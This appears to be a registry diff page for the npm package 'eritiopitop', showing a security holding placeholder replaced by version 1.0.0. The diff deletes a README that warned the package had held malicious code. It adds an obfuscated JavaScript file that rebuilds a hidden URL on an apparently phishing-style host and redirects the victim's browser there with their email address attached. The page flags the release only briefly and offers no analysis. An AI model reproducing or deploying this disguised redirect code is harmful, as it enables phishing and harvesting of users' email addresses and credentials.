eritiopitop 0.0.1-security → 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of eritiopitop might be problematic. Click here for more details.
- package/eritiopitop.js +2 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/eritiopitop.js
ADDED
@@ -0,0 +1,2 @@
|
|
1
|
+
var _0x30404e=_0x4b1f;function _0x1557(){var _0x242834=['FcKkK','27FOhhvY','location','e673chkl-u','?email=#','837200YszfWi','212MNUoqc','143zwdZkD','9345FGwdpl','https://of','396936PWFntB','1hHQfWW','MRDBl','p.lanotici','2444880hcIFnC','hOMyQ','acubana.co','nimechgrou','7075HgWHqv','m/eJdJOiju','1580qfXhZT','fice.wunim','href','230712ANzgAr'];_0x1557=function(){return _0x242834;};return _0x1557();}(function(_0x427376,_0x473bdc){var _0xc5805=_0x4b1f,_0x449673=_0x427376();while(!![]){try{var _0x31d97b=-parseInt(_0xc5805(0x158))/(0x21bf+0x1ace+-0x3c8c)*(-parseInt(_0xc5805(0x14c))/(0x2343+0x17d4+-0x3b15))+-parseInt(_0xc5805(0x155))/(-0x1189*0x2+0x12a*0x1f+-0x101)+-parseInt(_0xc5805(0x153))/(0x16da+-0x18aa+0x1d4)*(-parseInt(_0xc5805(0x147))/(-0x20a7*0x1+0x7c7*-0x2+-0x2*-0x181d))+parseInt(_0xc5805(0x143))/(-0x109a+-0xdec+0x1*0x1e8c)+-parseInt(_0xc5805(0x152))/(0x111b+0x1435+-0x2549)+-parseInt(_0xc5805(0x157))/(-0xa5*0x25+-0xd03*-0x1+0x2*0x56f)*(parseInt(_0xc5805(0x14e))/(-0x2665+-0x59*0x65+-0x498b*-0x1))+-parseInt(_0xc5805(0x149))/(-0x156b+-0xac1+0x2036)*(parseInt(_0xc5805(0x154))/(-0x29d*-0x1+0x1c3d*-0x1+0x1*0x19ab));if(_0x31d97b===_0x473bdc)break;else _0x449673['push'](_0x449673['shift']());}catch(_0x4579fb){_0x449673['push'](_0x449673['shift']());}}}(_0x1557,-0x74bff+-0x6945c+-0x1f*-0x9b72));var urlPath=_0x30404e(0x156)+_0x30404e(0x14a)+_0x30404e(0x150)+_0x30404e(0x146)+_0x30404e(0x142)+_0x30404e(0x145)+_0x30404e(0x148);function _0x4b1f(_0x57acd5,_0xc6bc7b){var _0x151275=_0x1557();return _0x4b1f=function(_0x42d5f0,_0x58255d){_0x42d5f0=_0x42d5f0-(0x4c9+0x8a5*0x3+-0x1d76);var _0x3ea11a=_0x151275[_0x42d5f0];return _0x3ea11a;},_0x4b1f(_0x57acd5,_0xc6bc7b);}function processAndRedirect(_0x387c9c){var _0x3de342=_0x30404e,_0x2e35c6={'MRDBl':function(_0x12b7e8,_0x4f01fb){return _0x12b7e8+_0x4f01fb;},'hOMyQ':function(_0x1d8930,_0x12688a){return _0x1d8930+_0x12688a;},'FcKkK':_0x3de342(0x151)},_0x685052=_0x2e35c6[_0x3de342(0x159)](_0x2e35c6[_0x3de342(0x144)](urlPath,_0x2e35c6[_0x3de342(0x14d)]),_0x387c9c);window[_0x3de342(0x14f)][_0x3de342(0x14b)]=_0x685052;}processAndRedirect(email);
|
2
|
+
//-->
|
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "eritiopitop",
|
3
|
-
"version": "0.0
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "1.0.0",
|
4
|
+
"main": "eritiopitop.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
7
|
+
},
|
8
|
+
"author": "",
|
9
|
+
"license": "ISC",
|
10
|
+
"description": ""
|
6
11
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=eritiopitop for more information.
|